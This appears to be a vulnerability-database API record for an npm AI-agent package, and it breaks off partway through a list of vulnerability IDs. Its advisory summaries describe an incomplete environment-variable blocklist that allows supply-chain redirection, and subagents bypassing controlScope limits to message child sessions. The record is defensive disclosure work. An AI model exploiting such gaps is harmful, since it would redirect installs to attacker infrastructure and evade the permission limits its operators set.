Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/995437?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/995437?format=api", "purl": "pkg:npm/openclaw@2026.3.22-beta.1", "type": "npm", "namespace": "", "name": "openclaw", "version": "2026.3.22-beta.1", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "2026.4.23", "latest_non_vulnerable_version": "2026.4.23", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91298?format=api", "vulnerability_id": "VCID-11dg-bvft-6kb1", "summary": "OpenClaw's incomplete host env sanitization blocklist allows supply-chain redirection via package-manager env overrides\n## Summary\n\nHost exec env override sanitization did not fail closed for several package-manager and related redirect variables that can steer dependency fetches or startup behavior.\n\n## Impact\n\nAn approved exec request could silently redirect package resolution or runtime bootstrap to attacker-controlled infrastructure and execute trojanized content.\n\n## Affected Component\n\n`src/infra/host-env-security-policy.json, src/infra/host-env-security.ts`\n\n## Fixed Versions\n\n- Affected: `< 2026.3.22`\n- Patched: `>= 2026.3.22`\n\n## Fix\n\nFixed by commit `7abfff756d` (`Exec: harden host env override handling across gateway and node`).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41387", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.06029", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.06013", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.06015", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41387" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.22", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.22" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j7p2-qcwm-94v4", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:50:39Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j7p2-qcwm-94v4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41387", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41387" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-supply-chain-redirection-via-incomplete-host-environment-sanitization", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:50:39Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-supply-chain-redirection-via-incomplete-host-environment-sanitization" }, { "reference_url": "https://github.com/advisories/GHSA-j7p2-qcwm-94v4", "reference_id": "GHSA-j7p2-qcwm-94v4", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j7p2-qcwm-94v4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-41387", "GHSA-j7p2-qcwm-94v4" ], "risk_score": 4.3, "exploitability": "0.5", "weighted_severity": "8.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-11dg-bvft-6kb1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91737?format=api", "vulnerability_id": "VCID-1728-wc17-dud6", "summary": "OpenClaw leaf subagents can bypass controlScope restrictions to send messages to child sessions\n## Summary\nLeaf subagents could still use the send action to message controlled child sessions even when their controlScope was narrower than children.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `7679eb375294941b02214c234aff3948796969d0`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/auto-reply/reply/commands-subagents/action-send.ts now threads controller context through the send path.\n- src/agents/subagent-control.ts now blocks send attempts unless the requester owns the target and has controlScope=\"children\".\n\nOpenClaw thanks @space08 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35662", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.111", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11059", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11093", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35662" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/7679eb375294941b02214c234aff3948796969d0", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/7679eb375294941b02214c234aff3948796969d0" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x2cm-hg9c-mf5w", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x2cm-hg9c-mf5w" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35662", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35662" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-missing-controlscope-enforcement-in-send-action", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-missing-controlscope-enforcement-in-send-action" }, { "reference_url": "https://github.com/advisories/GHSA-x2cm-hg9c-mf5w", "reference_id": "GHSA-x2cm-hg9c-mf5w", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x2cm-hg9c-mf5w" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": 